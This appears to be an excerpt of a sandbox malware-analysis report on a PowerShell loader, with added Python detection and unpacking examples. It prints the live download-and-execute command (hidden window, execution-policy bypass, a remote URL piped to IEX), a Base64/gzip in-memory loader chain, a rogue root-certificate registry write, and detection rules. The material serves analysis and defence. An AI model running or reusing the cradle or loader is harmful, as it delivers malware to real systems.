Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb00100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000004.00000002.2033951833.000002E7E3060000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
Source: 19.2.powershell.exe.25703985aa8.4.raw.unpack, c599d343cac5014aad62aae883c42172b.cs .Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, xrossUpUgDCJrcSEI.cs .Net Code: nOoZahaniTFF System.AppDomain.Load(byte[])
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, xrossUpUgDCJrcSEI.cs .Net Code: nOoZahaniTFF System.AppDomain.Load(byte[])
Source: 19.2.powershell.exe.2576eee0000.8.raw.unpack, c599d343cac5014aad62aae883c42172b.cs .Net Code: c14bb2c7302fd95407b5e64edfbc46414 System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64EncodedData)$ms = New-Object System.IO.MemoryStream$ms.Write($compressedData, 0, $compressedData.Length)$ms.Position = 0$gzip = New-Object System.IO.Compression.GZipStream $ms,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" (2 identical records)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname" (4 identical records)
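The process-creation records above capture the loader's one-liner: a mixed-case `pOwerShEll` token, `-WindowStyle hidden`, `-ExecutionPolicy bypass`, a `WebClient.DownloadString` reached through `Microsoft.VisualBasic.Interaction.CallByName` so the method name never appears as a direct call, and the fetched text piped to `IEX`. The Python below is an added example written for this page, not part of the Joe Sandbox report: it runs a small rule set over constructed process-creation records (the first command line is the one recorded above; the two benign controls are made up) and returns the findings, a severity and the URL to block.

```python
import re

# Constructed process-creation records modelled on the "Process created" lines above.
# The first command line is the one the sandbox recorded; the other two are benign
# controls made up for this example.
SAMPLE_EVENTS = [
    {"parent": "cmd.exe",
     "cmdline": '''pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"'''},
    {"parent": "explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent": "cmd.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\build\deploy.ps1"},
]

# One rule per tell in the recorded command line. Order is the order findings are reported.
RULES = [
    ("exec_policy_bypass", re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I)),
    ("hidden_window",      re.compile(r"-w\w*\s+hidden", re.I)),
    ("reflective_invoke",  re.compile(r"\bCallByName\b|LoadWithPartialName", re.I)),
    ("download_cradle",    re.compile(r"Download(?:String|Data|File)", re.I)),
    ("invoke_expression",  re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
]
# Spellings a legitimate launcher produces; anything else that lowercases to the
# binary name (pOwerShEll) is the case anomaly the sandbox flags.
CANONICAL = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
             "POWERSHELL", "POWERSHELL.EXE", "pwsh", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def case_anomaly(cmdline):
    """True when the first token is PowerShell spelled with unusual casing."""
    parts = cmdline.strip().split()
    token = parts[0] if parts else ""
    return token.lower() in {"powershell", "powershell.exe", "pwsh", "pwsh.exe"} \
        and token not in CANONICAL


def analyze(cmdline):
    """Return the names of every rule the command line trips."""
    findings = [name for name, rx in RULES if rx.search(cmdline)]
    if case_anomaly(cmdline):
        findings.insert(0, "case_anomaly")
    return findings


def extract_urls(cmdline):
    return URL_RE.findall(cmdline)


def severity(findings):
    """A cradle that fetches and IEXes remote text is high on its own; single
    indicators such as -ExecutionPolicy Bypass are common in admin scripts."""
    f = set(findings)
    if {"download_cradle", "invoke_expression"} <= f:
        return "high"
    if "case_anomaly" in f or "reflective_invoke" in f:
        return "medium"
    return "low" if f else "none"


def triage(events):
    out = []
    for ev in events:
        findings = analyze(ev["cmdline"])
        out.append({"parent": ev["parent"], "severity": severity(findings),
                    "findings": findings, "urls": extract_urls(ev["cmdline"])})
    return out


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

Feed it the CommandLine field of Sysmon event 1 or Security 4688 (with command-line auditing enabled); the parent name is carried through so a cmd.exe or wscript.exe parent can be weighted separately.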
Source: Yara match File source: 00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1867257966.000002E7C8E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1868900966.000002E7CB886000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4B1663E1 push ebx; iretd 4_2_00007FFB4B16642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4B166435 push ebx; iretd 4_2_00007FFB4B16642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4B177969 push ebx; retf 4_2_00007FFB4B17796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFB4B162321 push eax; iretd 19_2_00007FFB4B16233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFB4B1655CB push esi; iretd 19_2_00007FFB4B1655D7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFB4B1619BA pushad ; ret 19_2_00007FFB4B1619C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFB4B230569 push ebx; retf 19_2_00007FFB4B23056A
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, BGdjDDpgXZdI.cs High entropy of concatenated method names: 'VvznAZMSelWH', 'rZtkoDGEuzAf', 'NqXffOYeALLeoVmZl', 'cqhTNJjvrwLmZ', 'XAUzuNIIifMSBkBnA', 'aqMTzLLmknnK', 'opHXlstebrMYzK', 'vTYYhyfeTSN', 'QsBrxZsssig', 'OlbygUKhPPgbra'
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, TUsMcMDxLo.cs High entropy of concatenated method names: 'CqnoGKqodh', 'SdYLFIZlxIrMD', 'NPukkKbqHQkAA', 'kQvJJnzylSR', 'dkNHbIsXjTEa', 'DqFabvntiuwcPmpJt', 'NoVTeUWwRrrordIQ', 'deTFpRPLpi', 'FcaBKFLMUTtkJ', 'xZLyKkTQEHR'
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, BGdjDDpgXZdI.cs High entropy of concatenated method names: 'VvznAZMSelWH', 'rZtkoDGEuzAf', 'NqXffOYeALLeoVmZl', 'cqhTNJjvrwLmZ', 'XAUzuNIIifMSBkBnA', 'aqMTzLLmknnK', 'opHXlstebrMYzK', 'vTYYhyfeTSN', 'QsBrxZsssig', 'OlbygUKhPPgbra'
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, TUsMcMDxLo.cs High entropy of concatenated method names: 'CqnoGKqodh', 'SdYLFIZlxIrMD', 'NPukkKbqHQkAA', 'kQvJJnzylSR', 'dkNHbIsXjTEa', 'DqFabvntiuwcPmpJt', 'NoVTeUWwRrrordIQ', 'deTFpRPLpi', 'FcaBKFLMUTtkJ', 'xZLyKkTQEHR'
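The AMSI capture in this section shows the in-memory unpacking chain (FromBase64String into a MemoryStream, then a GZipStream), and the .Net Code records show the inflated bytes handed to `Assembly.Load(byte[])` / `AppDomain.Load(byte[])`. The Python below is an added example, not code from the report or from the sample: it reconstructs a stager around that API sequence using a constructed, fake PE payload (the real second stage is not reproduced; the variable names outside the captured fragment are assumptions), then reverses the chain the way an analyst would, pulling long Base64 literals, inflating any that carry the gzip magic and checking whether the result is an MZ/PE image.

```python
import base64
import gzip
import re
import struct


def build_fake_pe():
    """Constructed stand-in for a dropped assembly: MZ stub, e_lfanew at 0x3C,
    a 'PE\\0\\0' signature and filler standing in for section data. It is not
    the sample's real second stage."""
    pe_offset = 0x40
    stub = bytearray(b"MZ" + b"\x00" * (pe_offset - 2))
    struct.pack_into("<I", stub, 0x3C, pe_offset)
    return bytes(stub) + b"PE\x00\x00" + b"\x00" * 32 + bytes(range(256))


def build_stager(payload):
    """Wrap a payload the way the AMSI-captured script does: gzip, then a Base64
    literal the script inflates through MemoryStream + GZipStream. Only the API
    sequence comes from the capture; the surrounding lines are reconstructed."""
    blob = base64.b64encode(gzip.compress(payload)).decode()
    return "\n".join([
        "$base64EncodedData = '" + blob + "'",
        "$compressedData = [System.Convert]::FromBase64String($base64EncodedData)",
        "$ms = New-Object System.IO.MemoryStream",
        "$ms.Write($compressedData, 0, $compressedData.Length)",
        "$ms.Position = 0",
        "$gzip = New-Object System.IO.Compression.GZipStream $ms, ([IO.Compression.CompressionMode]::Decompress)",
        "[System.Reflection.Assembly]::Load($decompressed)",   # assumed variable name
    ])


# A quoted Base64 run long enough to be a payload rather than a short string.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{64,}={0,2})'")
# The loader/unpacker calls worth flagging in script-block logs (event 4104).
LOADER_TELLS = re.compile(
    r"\[System\.Reflection\.Assembly\]::Load\(|\[AppDomain\]::CurrentDomain\.Load\(|GZipStream",
    re.I)


def unwrap(script):
    """Reverse the observed chain for every long Base64 literal: Base64 -> (gzip) -> bytes."""
    recovered = []
    for literal in B64_LITERAL.findall(script):
        raw = base64.b64decode(literal)
        if raw[:2] == b"\x1f\x8b":          # gzip magic; otherwise keep the raw bytes
            raw = gzip.decompress(raw)
        recovered.append(raw)
    return recovered


def is_pe(data):
    """True for an MZ/PE image, which is what Assembly.Load(byte[]) expects."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def loader_tells(script):
    """Distinct loader/unpacker calls present in the script text."""
    return sorted({m.group(0) for m in LOADER_TELLS.finditer(script)})


if __name__ == "__main__":
    script = build_stager(build_fake_pe())
    for blob in unwrap(script):
        print("recovered %d bytes, PE image: %s" % (len(blob), is_pe(blob)))
    print(loader_tells(script))
```

On a real capture, write each recovered PE to disk and hash it; the `.raw.unpack` names above are the sandbox's own dumps of exactly these inflated buffers.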

                      Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob (2 identical records)

                      Boot Survival

Source: Yara match File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
